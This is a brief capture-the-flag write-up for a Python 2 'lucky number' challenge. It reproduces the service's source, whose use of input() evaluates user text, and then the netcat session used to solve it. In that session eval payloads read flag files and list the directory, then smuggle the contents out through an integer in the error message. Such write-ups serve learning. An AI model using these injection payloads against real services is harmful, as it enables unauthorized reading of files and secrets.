Pyeval 2

BioTerra CTF : Lucky Number Writeup

I learnt the Eval() vulnerability only after seeing this question and blogged about some basic exploit too.. but i was unable to get the flag , on of my senior helped me out so here it goes ..

#!/usr/bin/env python2 import logging as log import sys log.basicConfig(filename="lucky_number.log") FLAG_FILE = "flag.txt" def getSecret(): return open(FLAG_FILE).read() def prime_factor(n): i = 2 while i * i <= n: if n % i: i += 1 else: n //= i return n def check_number(number): """ Checks if a number is a good lucky number. """ if not isinstance(number, int) or number < 1: # condition must be false = not true return False for i in range(3): number = number << i * i if number > 0xAAA: return False cor = prime_factor(number >> 3) ** 3 if cor == 8 or cor == 4412: return False number = number & 0xF0F0 >> 8 return number << 1 == cor def main(): sys.stdout.write("Your lucky number:") sys.stdout.flush() number = int(input("")) if check_number(number): print(getSecret()) else: print("Sorry " + str(number) + " is not a good lucky number.") if __name__ == '__main__': try: main() except BaseException as ex: log.error(str(type(ex)) + str(ex)) print("Dafuq are you doing?")

The solution goes like this ...

$ nc 4455 Your lucky number: eval('int(open("flag.txt").read().encode("hex"),16)') Sorry 337525767188140550088399172147333634157597015656050502929863081620339940171846970455466902578741092263765041199540418055192913726139466963575148968021390277031169335897610 is not a good lucky number. decode -> 'You came here to find a flag. I have bad news: you have to dig deeper.\n' $ nc 4455 Your lucky number:eval('int(" ".join(__import__("glob").glob("*")).encode("hex"),16)') Sorry 1453562628065643472662079201217526249117057357179171707844479822976819718786584261355165292489996053572269641484875558843221517604363350353212944732271179892 is not a good lucky number. decode-> 'lib flag.txt dev lib64 lucky_number.log usr real_flag.txt' $ nc 4455 Your lucky number:eval('int(open("real_flag.txt").read().encode("hex"),16)') Sorry 42134526936706142044723527334065041550540595781765024517455445258 is not a good lucky number. decode -> FLAG

I too first tried to sys.stdout.write(getScret()) buy as u can see that was not original flag just a troll (:
the trick used here first we have to encode the output in hex and then int ...